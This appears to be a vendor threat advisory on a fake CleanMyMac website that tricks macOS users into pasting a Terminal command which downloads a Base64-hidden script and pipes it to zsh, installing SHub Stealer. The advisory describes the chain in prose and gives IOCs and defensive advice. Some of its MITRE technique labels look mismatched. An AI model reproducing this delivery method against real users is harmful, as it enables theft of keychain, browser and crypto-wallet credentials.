Deceptive "CleanMyMac" Site Delivers SHub Stealer and Crypto Wallet Backdoors via ClickFix Technique
Executive Summary
Security researchers have identified a sophisticated social engineering campaign targeting macOS users impersonating the popular system utility, CleanMyMac. The attackers have deployed a deceptive website (cleanmymacos[.]org) that mimics the legitimate product page to lure users into executing a malicious shell script. This campaign utilizes the "ClickFix" technique, a method that bypasses traditional email or attachment-based delivery by tricking users into pasting commands directly into their Terminal application. Once executed, the payload installs SHub Stealer, a potent macOS infostealer capable of harvesting sensitive credentials, including Apple Keychain data, browser autofill information, and, critically, cryptocurrency wallet credentials. This analysis details the TTPs used by the threat actor and provides IOCs to help organizations defend against this evolving threat.
Threat Analysis
Impersonation and Social Engineering
The attack begins with a high-fidelity impersonation of the CleanMyMac product page. The domain cleanmymacos[.]org is designed to look nearly identical to the official MacPaw website. The landing page presents a "fake" advanced installation option, a psychological trigger often used to bypass security skepticism among "power users" who believe they are upgrading their system configuration.
The ClickFix Delivery Mechanism
Unlike traditional malware delivery via email attachments or drive-by downloads, this campaign relies on user interaction within the operating system shell. The victim is instructed to open the Terminal application and paste a specific command string. This technique, known as ClickFix, has become increasingly prevalent among macOS threat actors because it is difficult for automated defenses to block without false positives, as the user is voluntarily running code.
Technical Execution Chain
Upon pasting the command into Terminal, the execution chain proceeds rapidly:
Legitimacy Layer: The first step of the script is to print a reassuring line of text:
macOS-CleanMyMac-App: https://macpaw.com/cleanmymac/us/app. This mimics the output of a legitimate script, creating a false sense of security and confirming to the user that the script is related to the official software.Decoding Layer: Following the echo command, the script decodes a Base64-encoded link. This obfuscation hides the true destination of the download, preventing basic URL filtering from catching the malicious payload.
Execution Layer: The script downloads a shell script from the attacker’s server and pipes it directly into
zsh(Z Shell) for immediate execution. This bypasses the need for the user to save a file to disk first, making the process feel instantaneous and seamless.
SHub Stealer Capabilities
The payload delivered by this script is SHub Stealer. This malware is designed not just for generic data exfiltration but with a specific focus on high-value assets:
Credential Harvesting: It targets saved passwords and browser data.
Apple Keychain Access: It attempts to extract secrets stored in the system-wide keychain, which often contains credentials for accounts the user has authorized.
Cryptocurrency Wallet Backdoors: Perhaps the most dangerous capability mentioned in the report is the malware's ability to modify crypto wallet applications, such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live. By injecting itself into these processes, the malware can intercept or steal the wallet’s recovery phrase (seed phrase), effectively granting attackers control over the victim's cryptocurrency funds.
Telegram Session Hijacking: The stealer also targets Telegram sessions, allowing attackers to potentially access private communications or accounts.
MITRE ATT&CK Framework Mapping
This campaign aligns with several techniques observed in the MITRE ATT&CK framework:
T1566.001 (Phishing: Fake Website): The use of a spoofed domain to deceive users.
T1059.004 (Shellcode via Interpreted Language): The delivery and execution of code via Terminal and shell scripts.
T1003.001 (OS Credential Dumping): The specific targeting of Apple Keychain data.
T1525 (Implant Internal Image): The modification of legitimate wallet applications to hide malicious activity.
T1027 (Obfuscated Files or Information): The use of Base64 encoding to hide the malicious URL.
Indicators of Compromise (IOCs)
SecLookup has analyzed the domains mentioned in the report and confirmed malicious status. Below are the relevant indicators for your threat hunting and detection systems.
Domains
cleanmymacos[.]org
wallets-gate[.]io
URLs
https://macpaw[.]com/cleanmymac/us/app
(Note: This URL is legitimate and used by the attackers for deception; do not block the legitimate domain, but monitor for references to it.)
Email Addresses
command-and-controlserver@res2erch-sl0ut.com
attackbegins@cleanmymacos.org
Detailed Domain Intelligence (SecLookup Scan Results)
cleanmymacos.org
wallets-gate.io
SecLookup Detection
SecLookup’s Threat Intelligence platform has been actively monitoring this campaign. Our systems have confirmed that the domains cleanmymacos.org and wallets-gate.io are malicious and have been blocked for SecLookup users.
Recommendations
To mitigate the risk of this and similar ClickFix campaigns, we recommend the following security best practices:
Strict Software Procurement Policy: Remind users that legitimate software, including popular utilities like CleanMyMac, is distributed via the official MacPaw website or the Apple App Store. Legitimate applications should never require users to paste commands into Terminal to install them.
Terminal Awareness Training: Educate staff and power users about the dangers of the ClickFix technique. If a website prompts you to open Terminal and paste a command, pause and verify the source. A simple Google search for the command string can often reveal if it is malicious.
Crypto Wallet Vigilance: For users holding cryptocurrency, pay special attention to the security of their wallet applications. If a legitimate app (like Exodus or Ledger Live) suddenly starts behaving erratically or prompts for frequent updates or "recovery phrase" verifications, it may be compromised.
Network Segmentation: Ensure that endpoints are not able to execute arbitrary shell scripts from untrusted sources without approval.
References
- Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets by Malwarebytes Labs, Malwarebytes Labs
